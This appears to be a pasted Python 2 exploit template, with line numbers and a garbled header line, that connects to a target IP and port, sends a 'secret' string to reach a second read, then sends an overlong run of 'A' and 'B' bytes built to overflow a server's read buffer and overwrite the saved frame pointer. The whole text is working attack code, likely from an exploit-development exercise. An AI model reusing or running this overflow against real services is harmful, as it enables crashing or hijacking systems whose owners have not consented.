#!/usr/bin/pythonimport socket, sys, structif len(sys.argv) != 3: prin

1. #!/usr/bin/python
2.  
3. import socket, sys, struct
4.  
5. if len(sys.argv) != 3:
6. print "template.py IP PORT"
7. sys.exit(-1)
8.  
9. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10. sock.connect( (sys.argv[1], int(sys.argv[2])) )
11. # The first payload to get us into the second recv()
12. payload ="secret\n\x00"
13. sock.sendall(payload)
14. data = sock.recv(1024)
15. print "Sent 'secret' to server, got {0}".format(data)
16.  
17.  
18. # The second payload to take advantage of the overflow
19. payload = "A"*2024 # Fill the new acReadBuffer
20. payload = payload + "A"*12 # Fill nReadBytes, nSentBytes, nTemp
21. payload = payload + "B"*4 # Overwrite push ebp
22. sock.sendall(payload)
23. print "Sent {0} to server".format(payload)
24. data = sock.recv(1024)